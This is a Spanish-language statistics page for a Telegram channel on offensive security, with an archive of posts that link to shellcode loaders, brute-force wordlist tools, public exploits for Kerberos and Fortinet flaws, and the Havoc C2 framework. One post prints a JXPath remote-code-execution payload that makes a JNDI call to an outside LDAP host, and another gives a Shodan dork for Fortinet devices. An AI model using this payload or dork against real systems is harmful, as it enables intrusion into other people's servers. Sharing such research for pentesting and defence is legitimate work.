APT

Ir al canal en Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Rusia45 631 Tecnologías y Aplicaciones8 841...

📈 Análisis del canal de Telegram APT

El canal APT (@apt_notes) en el segmento lingüístico de Inglés es un actor destacado. Actualmente la comunidad reúne a 14 658 suscriptores, ocupando la posición 8 841 en la categoría Tecnologías y Aplicaciones y el puesto 45 631 en la región Rusia.

📊 Métricas de audiencia y dinámica

Desde su creación el невідомо, el proyecto ha mostrado un crecimiento acelerado, reuniendo a 14 658 suscriptores.

Según los últimos datos del 12 junio, 2026, el canal mantiene una actividad estable. En los últimos 30 días la variación de miembros fue de 406, y en las últimas 24 horas de 7, conservando un alto alcance.

Estado de verificación: No verificado
Tasa de interacción (ER): El promedio de interacción de la audiencia es 49.89%. Durante las primeras 24 horas tras publicar, el contenido suele obtener N/A% de reacciones respecto al total de suscriptores.
Alcance de las publicaciones: Cada publicación recibe en promedio 7 313 visualizaciones. En el primer día suele acumular 0 visualizaciones.
Reacciones e interacción: La audiencia responde de forma activa: el promedio de reacciones por publicación es 20.

📝 Descripción y política de contenido

El autor describe el recurso como un espacio para expresar opiniones subjetivas:
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

Gracias a la alta frecuencia de actualizaciones (últimos datos recibidos el 13 junio, 2026), el canal mantiene la vigencia y un amplio alcance. La analítica demuestra que la audiencia interactúa activamente con el contenido, lo que lo convierte en un punto de referencia dentro de la categoría Tecnologías y Aplicaciones.

14 658

Suscriptores

+724 horas

+1007 días

+40630 días

7 313

Visitas de la publicación

Sin datos24 horas

Sin datos48 horas

49.89%

Tasa de compromiso

Sin datos

Mensajes por día

Ads index

beta

Archivo de publicaciones

14 658

Repost from Ralf Hacker Channel

Новые сюрпризы в AD CS... Добавим технику ESC11🙈 https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/ #ad #pentest #redteam

14 658

💤 laZzzy This is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques. Features: — Direct syscalls and native functions; — Import Address Table (IAT) evasion; — Encrypted payload (XOR and AES); — PPID spoofing; — Blocking of non-Microsoft-signed DLLs; — etc. https://github.com/capt-meelo/laZzzy #maldev #loader #cpp #redteam

14 658

🥷 PNG Steganography Hides Backdoor Malware authors rely on LSB encoding to hide malicious payload in the PNG pixel data, more specifically in LSB of each color channel (Red, Green, Blue, and Alpha). https://decoded.avast.io/martinchlumecky/png-steganography/ #maldev #steganography #png

14 658

🛠 DynamicSyscalls This is a library written in .net resolves the syscalls dynamically (Has nothing to do with hooking/unhooking) https://github.com/Shrfnt77/DynamicSyscalls #maldev #csharp #syscall #library

14 658

Repost from Offensive Xwitter

😈 [ ShitSecure, S3cur3Th1sSh1t ] I really like DeepL for translations. But I also like the fact, that when using the Desktop APP is makes use of an signed executable named CreateDump.exe in %APPDATA%, which can dump e.g. LSASS 🧐🤩 🐥 [ tweet ]

14 658

⚙️ Psudohash — Password List Generator For Orchestrating Brute Force Attacks This is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. https://github.com/t3l3machus/psudohash #wordlist #password #generator #bruteforce

14 658

Bash Aliases for CrackMapExec Modules CrackMapExec has one of the coolest features - "Audit Mode". This features makes life easier for a pentester by masking the password in the CME output. However, most often a pentester needs this functionality only as a one-time action, take a screenshot and disable it. That's why I wrote a simple Bash Alias that allows you to turn "Audit Mode" on and off with a single command. As a bonus, I've implemented an Alias for the bh_owned module. This can be useful if you haven't received a BloodHound dump yet and a module error is annoys you. Just include these lines in your ~/.zshrc or ~/.bashrc and enjoy. Aliases:

alias CMEOwned='awk '\''/bh_enabled/{ if ($3=="False") {$3="True"} else {$3="False"}; {if($3=="True") {print "\033[1;92m" "[+] BloodHound Owned: "$3} else print "\033[1;91m" "[-] BloodHound Owned: "$3}} {print > FILENAME }'\'' /root/.cme/cme.conf'

alias CMEAudit='awk '\''/audit_mode/{ if ($3=="") {$3="*"} else {$3=""} {if($3==""){print "\033[1;92m" "[+] Audit Mode: Enable"} else print "\033[1;91m" "[-] Audit Mode: Disable"}} {print > FILENAME }'\'' /root/.cme/cme.conf'

#cme #bash #alias #bloodhound #audit #masking

14 658

⚔️ Katana — Web Crawler A next-generation crawling and spidering framework. Features: — Standard/Headless — Customizable Config — JavaScript parsing — Scope control https://github.com/projectdiscovery/katana #web #crawler #tools #bugbounty

14 658

Repost from Offensive Xwitter

😈 [ an0n_r0, an0n ] here is the proper way to RC4 encode with OpenSSL compatible with SystemFunction032 (use the raw hex key instead of passphrase). awesome shellcode exec method from @ShitSecure 👍 https://t.co/renlMV0rsE 🔗 https://s3cur3th1ssh1t.github.io/SystemFunction032_Shellcode/ 🐥 [ tweet ][ quote ]

14 658

🔑 Abuse Kerberos RC4 (CVE-2022-33679) This blog post goes into detail on how Windows Kerberos Elevation of Privilege vulnerability works and how to force Kerberos to downgrade the encoding from the default AES encryption to the historical MD4-RC4. The vulnerability could allows an attacker to obtain an authenticated session on behalf of the victim and also lead to arbitrary code execution. Research: https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html Exploit: https://github.com/Bdenneu/CVE-2022-33679 #ad #kerberos #rc4 #exploit

14 658

Repost from Информационная безопасность

Phishing campaigns Сделал github репозиторий, в котором представлены разборы/отчёты об фишинговых кампаниях APT группировок, которые содержат пример писем, с помощью которого осуществлялась рассылка. Зачастую разборы атак APT группировок не содержат примеры писем, это побудило меня создать репозиторий в котором будут отчёты/разборы, которые точно содержат фишинговое письмо. Постепенно данный список будет пополняться Link: https://github.com/wddadk/Phishing-campaigns #apt #git #phishing

14 658

🌀 Unique Subdomain Enumeration Great research regarding subdomain enumeration through permutations, unique approach that can provide good results with a smaller initial bruteforce data set in comparison to altdns Research: https://cramppet.github.io/regulator/index.html Tools: https://github.com/cramppet/regulator #subdomain #enumeration #permutation #tools

14 658

⚙️ Apache Commons Jxpath (CVE-2022-41852) This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server. Payload:

jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

PoC: https://github.com/Warxim/CVE-2022-41852 Research: https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/ #apache #commons #jxpath #cve #exploit

14 658

Repost from Offensive Xwitter

😈 [ dafthack, Beau Bullock ] Finding cleartext creds in AD user attributes is something that happens more than most might think. Great demo John! Here's a 1-liner to find these while leveraging PowerView: https://t.co/ZItkN8BjZ9 And here's one for Azure AD: https://t.co/IcCHRYPrE5 🔗 https://gist.github.com/dafthack/5f8c36f7468fad991e9e1f6d81ec29d4 🐥 [ tweet ][ quote ]

14 658

🔑 YubiKeys Relaying Attack That is, the APDU packets that the server application wants to get signed by a private key to verify the identity of the authentication. This attack works on all PIV Smart Cards. Research: Relaying YubiKeys Part 1 Relaying YubiKeys Part 2 Tools: https://github.com/cube0x0/YubiKey-Relay #ad #2fa #fido2 #ybikeys

14 658

📄 Detecting ADCS Web Services Abuse (ESC8) One of the popular attack vectors against Active Directory Certificate Services is ESC8. This article covers detecting irregular access to some ADCS web services exposed, as well as detecting the NTLM relaying itself. https://medium.com/falconforce/falconfriday-detecting-adcs-web-services-abuse-0xff20-9f660c83cb36 #adcs #detection #esc8 #blueteam

14 658

⌛ Attacking Predictable GUID Few penetration testers and bug bounty hunters are aware of the different versions of GUIDs and the security issues associated with using the wrong one. In this blog post walk through an account takeover issue from a recent penetration test where GUIDs were used as password reset tokens. https://www.intruder.io/research/in-guid-we-trust #web #pentest #guid #account #takeover

14 658

😈 Fortinet RCE (CVE-2022-40684) Fortinet recently patched a critical authentication bypass vulnerability in their FortiOS, FortiProxy, and FortiSwitchManager projects (CVE-2022-40684). This vulnerability gives an attacker the ability to login as an administrator on the affected system. Shodan Dork: product:"Fortinet FortiGate" Research: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/ PoC: https://github.com/NagliNagli/BountyTricks/blob/main/CVE-2022-40684.yaml Exploit: https://github.com/horizon3ai/CVE-2022-40684 Detection for SOC: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/ #fortinet #rce #research #poc #exploit

14 658

Repost from Offensive Xwitter

😈 [ pdiscoveryio, ProjectDiscovery.io ] The Ultimate Guide to Finding Bugs With Nuclei by @v3natoris https://t.co/2GY3QZlTft #hackwithautomation #cybersecurity #infosec #bugbounty 🔗 https://blog.projectdiscovery.io/ultimate-nuclei-guide/ 🐥 [ tweet ]

14 658

Repost from 1N73LL1G3NC3

Havoc is a modern and malleable post-exploitation command and control framework Features: Client - Modern, dark theme based on Dracula Teamserver - Multiplayer - Payload generation (exe/shellcode/dll) - HTTP/HTTPS listeners - Customizable C2 profiles - External C2 Demon - Sleep Obfuscation via Ekko or FOLIAGE - x64 return address spoofing - Indirect Syscalls for Nt* APIs - SMB support - Token vault - Variety of built-in post-exploitation commands